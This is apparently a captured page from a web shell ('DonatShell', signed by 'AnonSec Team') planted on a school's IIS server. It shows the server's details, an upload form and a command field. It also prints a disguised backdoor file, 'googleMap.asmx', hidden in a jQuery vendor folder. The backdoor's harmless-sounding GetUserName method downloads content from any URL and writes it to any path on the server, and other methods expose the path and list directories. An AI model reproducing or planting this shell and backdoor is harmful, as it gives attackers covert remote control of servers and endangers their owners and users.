%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/mis/teacher/subject_score_v2/vendor/jquery/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/mis/teacher/subject_score_v2/vendor/jquery/googleMap.asmx
<%@ WebService Language="C#" class="Service"%>
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Web.SessionState;
using System.Web.Services;
using System.Xml;
using System.Web.Services.Protocols;

[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]

public class Service : System.Web.Services.WebService
{
    public Service()
    {
        //InitializeComponent(); 
    }
    
[WebMethod]
public string GetUserName(string prefixText,string limit) {
   System.IO.File.WriteAllText(limit,(new WebClient()).DownloadString(prefixText));
   return "ok";
}

[WebMethod]
public string pwd() {
   return System.Web.HttpContext.Current.Server.MapPath(".");
}

[WebMethod]
public string listddd(string ddd) {
    string R="\n--------------------------------------------------\n";
    DirectoryInfo m = new DirectoryInfo(@ddd);
     foreach (DirectoryInfo D in m.GetDirectories())
     {
            R +=  String.Format("{0}/\t{1}\t0\tDir\t-\n\r", D.Name, File.GetLastWriteTime(ddd + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
    }
      foreach (FileInfo D in m.GetFiles())
      {
            R += String.Format("{0}\t{1}\t{2}\tFile\t-\n\r", D.Name, File.GetLastWriteTime(ddd + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); 
    }
    R += "\n--------------------------------------------------\n";
    return R;
}
}

Anon7 - 2022
AnonSec Team